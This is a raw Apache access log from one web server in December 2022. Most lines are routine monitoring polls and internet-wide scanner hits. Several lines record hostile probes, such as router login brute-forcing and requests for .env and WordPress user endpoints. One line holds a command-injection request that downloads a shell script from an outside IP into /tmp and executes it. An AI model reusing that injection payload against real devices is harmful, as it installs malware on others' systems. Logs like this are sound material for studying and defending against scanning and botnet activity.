212.91.246.72 - - [02/Dec/2022:10:34:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:35:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [02/Dec/2022:10:35:54 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
190.94.138.100 - - [02/Dec/2022:10:36:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Dec/2022:10:36:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:37:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.251.102.74 - - [02/Dec/2022:10:38:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
23.251.102.74 - - [02/Dec/2022:10:38:08 +0100] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Dec/2022:10:38:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.203.57.7 - - [02/Dec/2022:10:39:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
212.91.246.72 - - [02/Dec/2022:10:39:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:40:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:41:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [02/Dec/2022:10:42:22 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [02/Dec/2022:10:42:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [02/Dec/2022:10:43:22 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.77.209 - - [02/Dec/2022:10:43:29 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.77.209 - - [02/Dec/2022:10:43:42 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [02/Dec/2022:10:43:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:44:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [02/Dec/2022:10:45:06 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.77.209 - - [02/Dec/2022:10:45:33 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [02/Dec/2022:10:45:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [02/Dec/2022:10:46:22 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [02/Dec/2022:10:46:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [02/Dec/2022:10:47:23 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [02/Dec/2022:10:47:39 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:10:47:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.21.172.128 - - [02/Dec/2022:10:48:48 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:10:48:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:49:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.15 - - [02/Dec/2022:10:50:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Dec/2022:10:50:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:51:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:52:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:53:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:54:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [02/Dec/2022:10:55:30 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:10:55:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.58.127.225 - - [02/Dec/2022:10:56:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [02/Dec/2022:10:56:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:57:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:58:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:10:59:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.96.203.18 - - [02/Dec/2022:10:59:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.96.203.18 - - [02/Dec/2022:10:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2022:11:00:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:01:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.124 - - [02/Dec/2022:11:02:02 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:11:02:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.15 - - [02/Dec/2022:11:03:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
183.136.225.32 - - [02/Dec/2022:11:03:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
80.82.77.33 - - [02/Dec/2022:11:03:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
80.82.77.33 - - [02/Dec/2022:11:03:29 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
80.82.77.33 - - [02/Dec/2022:11:03:30 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
80.82.77.33 - - [02/Dec/2022:11:03:30 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
80.82.77.33 - - [02/Dec/2022:11:03:30 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
212.91.246.72 - - [02/Dec/2022:11:03:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:04:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:05:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.221.101 - - [02/Dec/2022:11:06:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Dec/2022:11:06:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:07:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:08:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.71.235.186 - - [02/Dec/2022:11:09:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [02/Dec/2022:11:09:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:10:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [02/Dec/2022:11:11:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:11:11:03 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:11:11:05 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [02/Dec/2022:11:11:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:12:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:13:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:14:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.80 - - [02/Dec/2022:11:15:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.80 - - [02/Dec/2022:11:15:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.80 - - [02/Dec/2022:11:15:22 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.80 - - [02/Dec/2022:11:15:37 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Dec/2022:11:15:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.32.122.51 - - [02/Dec/2022:11:15:54 +0100] "GET /wp-json/wp/v2/users HTTP/1.1" 404 324 "-" "python-requests/2.27.1"
194.32.122.51 - - [02/Dec/2022:11:15:55 +0100] "GET /wp-admin/install.php HTTP/1.1" 404 325 "-" "python-requests/2.27.1"
212.91.246.72 - - [02/Dec/2022:11:16:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:17:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.52.54.35 - - [02/Dec/2022:11:18:42 +0100] "\x16\x03\x01\x01 \x01" 400 329 "-" "-"
164.52.54.35 - - [02/Dec/2022:11:18:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:11:18:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:11:18:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:11:18:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
212.91.246.72 - - [02/Dec/2022:11:18:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.52.54.35 - - [02/Dec/2022:11:18:58 +0100] "\x16\x03\x01\x01 \x01" 400 329 "-" "-"
164.52.54.35 - - [02/Dec/2022:11:19:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:11:19:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:11:19:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:11:19:17 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
141.255.166.2 - - [02/Dec/2022:11:19:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Dec/2022:11:19:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:20:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:21:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:22:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [02/Dec/2022:11:23:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Dec/2022:11:23:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [02/Dec/2022:11:24:07 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:11:24:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:25:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.221.101 - - [02/Dec/2022:11:25:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Dec/2022:11:26:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
173.214.175.178 - - [02/Dec/2022:11:27:02 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
141.255.166.2 - - [02/Dec/2022:11:27:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Dec/2022:11:27:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.21.172.128 - - [02/Dec/2022:11:28:51 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:11:28:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:29:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.124 - - [02/Dec/2022:11:30:15 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:11:30:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [02/Dec/2022:11:31:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Dec/2022:11:31:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:32:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.15 - - [02/Dec/2022:11:33:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Dec/2022:11:33:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.15 - - [02/Dec/2022:11:33:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Dec/2022:11:34:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.142.236.41 - - [02/Dec/2022:11:35:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.41 - - [02/Dec/2022:11:35:18 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.41 - - [02/Dec/2022:11:35:18 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.41 - - [02/Dec/2022:11:35:19 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.41 - - [02/Dec/2022:11:35:25 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
212.91.246.72 - - [02/Dec/2022:11:35:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:36:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:37:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:38:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:39:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:40:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.75.3.35 - - [02/Dec/2022:11:41:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
141.255.166.2 - - [02/Dec/2022:11:41:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Dec/2022:11:41:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.133.58 - - [02/Dec/2022:11:41:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.133.58 - - [02/Dec/2022:11:41:56 +0100] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
85.31.44.156 - - [02/Dec/2022:11:42:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
128.14.141.34 - - [02/Dec/2022:11:42:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [02/Dec/2022:11:42:45 +0100] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
85.31.44.156 - - [02/Dec/2022:11:42:46 +0100] "GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://185.132.53.105/f/strs.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [02/Dec/2022:11:42:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [02/Dec/2022:11:42:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Dec/2022:11:43:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.15 - - [02/Dec/2022:11:44:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Dec/2022:11:44:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [02/Dec/2022:11:45:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:11:45:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Dec/2022:11:45:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:46:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:47:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:48:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [02/Dec/2022:11:49:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
69.162.243.124 - - [02/Dec/2022:11:49:43 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.243.124 - - [02/Dec/2022:11:49:44 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Dec/2022:11:49:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
